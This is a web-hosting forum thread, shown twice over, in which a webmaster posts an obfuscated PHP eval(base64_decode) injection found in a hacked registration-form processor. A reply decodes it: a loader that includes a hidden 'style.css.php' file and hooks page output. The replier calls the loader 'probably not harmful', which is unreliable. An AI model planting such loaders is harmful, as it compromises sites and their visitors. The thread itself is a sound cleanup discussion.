I have 5 annual archery tournament events that I use forms created here for registration online, has worked for 4 or 5 years, up through Jan & Feb. 2010. Now the forms go as usual and display the confirmation page, but no emails get sent. My ISP tech support did notice that the processor.php file had been hacked with this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMy9yb25jYXJtaS9wdWJsaWNfaHRtbC90ZXhhc2FyY2hlcnkvQmVpamluZ01hdGNocGxheS9BcmNoZXJ5VmVudWUvQmFpbGV5UGVtYmVydG9uL3RodW1icy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
I removed that code, but still cannot get the processor.php to send emails. arghhhh.
First, whut the heck was the inserted code doing, and after removing it from the processor.php file, is this possibly why I still cannot get emails to go out upon submit of the form? IOW, did it break something else?
Second, HOW the heck did someone insert this code? I checked the four other processor.php files (one for each archery tournament registration instance) and only some of the files had been altered, not all.
Third, how do I prevent anyone from hacking this file again?
I've been down for a week and this is really crunch time for me - I have to get this working asap for a tourney next month and I can't figure out why it suddenly doesn't work now, when it did just a month or two back…
The registration form can be seen at http://texasarchery.org/Registrations/10/Field/form.html
My ISP did do some kind of upgrades recently, forced everyone to go to much more aggressive passwords for accounts. May have been a clue as to how my processor.php files were compromised (no other damage anywhere on my humongous site that I can tell)
Suggestions appreciated!
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
First, here is the decode:
if(function_exists('ob_start')&&!isset($GLOBALS)){$GLOBALS='/home3/roncarmi/public_html/texasarchery/BeijingMatchplay/ArcheryVenue/BaileyPemberton/thumbs/style.css.php';if(file_exists($GLOBALS)){include_once($GLOBALS);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
it is probably not harmfull as the path to an executable is not likely to be accessible on your site or your host.
Second:
If you set permissions to 777 or 666 then anyone can modify this file.
Third:
PHP files should only need to have read permissions on a live site. They would need write permissions for you in order for you to modify the file if and when necessary.
Change PHP file permissions to 644 or 664.
Last, if you still need help send me an email.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
Hi - thank you - I have that working now. I checked the permissions via chmod and it was NOT set to 644, so I have fixed that.
So that code simply pointed to another location on my server, where I have a folder full of photos created through JAlbum.
I think my isp heightened their security systems and once they did something on their end, things seemed to start behaving normally.
My thanks!
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I have 5 annual archery tournament events that I use forms created here for registration online, has worked for 4 or 5 years, up through Jan & Feb. 2010. Now the forms go as usual and display the confirmation page, but no emails get sent. My ISP tech support did notice that the processor.php file had been hacked with this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lMy9yb25jYXJtaS9wdWJsaWNfaHRtbC90ZXhhc2FyY2hlcnkvQmVpamluZ01hdGNocGxheS9BcmNoZXJ5VmVudWUvQmFpbGV5UGVtYmVydG9uL3RodW1icy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
I removed that code, but still cannot get the processor.php to send emails. arghhhh.
First, whut the heck was the inserted code doing, and after removing it from the processor.php file, is this possibly why I still cannot get emails to go out upon submit of the form? IOW, did it break something else?
Second, HOW the heck did someone insert this code? I checked the four other processor.php files (one for each archery tournament registration instance) and only some of the files had been altered, not all.
Third, how do I prevent anyone from hacking this file again?
I've been down for a week and this is really crunch time for me - I have to get this working asap for a tourney next month and I can't figure out why it suddenly doesn't work now, when it did just a month or two back…
The registration form can be seen at
http://texasarchery.org/Registrations/10/Field/form.html
My ISP did do some kind of upgrades recently, forced everyone to go to much more aggressive passwords for accounts. May have been a clue as to how my processor.php files were compromised (no other damage anywhere on my humongous site that I can tell)
Suggestions appreciated!
First, here is the decode:
if(function_exists('ob_start')&&!isset($GLOBALS)){$GLOBALS='/home3/roncarmi/public_html/texasarchery/BeijingMatchplay/ArcheryVenue/BaileyPemberton/thumbs/style.css.php';if(file_exists($GLOBALS)){include_once($GLOBALS);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
it is probably not harmfull as the path to an executable is not likely to be accessible on your site or your host.
Second:
If you set permissions to 777 or 666 then anyone can modify this file.
Third:
PHP files should only need to have read permissions on a live site. They would need write permissions for you in order for you to modify the file if and when necessary.
Change PHP file permissions to 644 or 664.
Last, if you still need help send me an email.
Hi - thank you - I have that working now. I checked the permissions via chmod and it was NOT set to 644, so I have fixed that.
So that code simply pointed to another location on my server, where I have a folder full of photos created through JAlbum.
I think my isp heightened their security systems and once they did something on their end, things seemed to start behaving normally.
My thanks!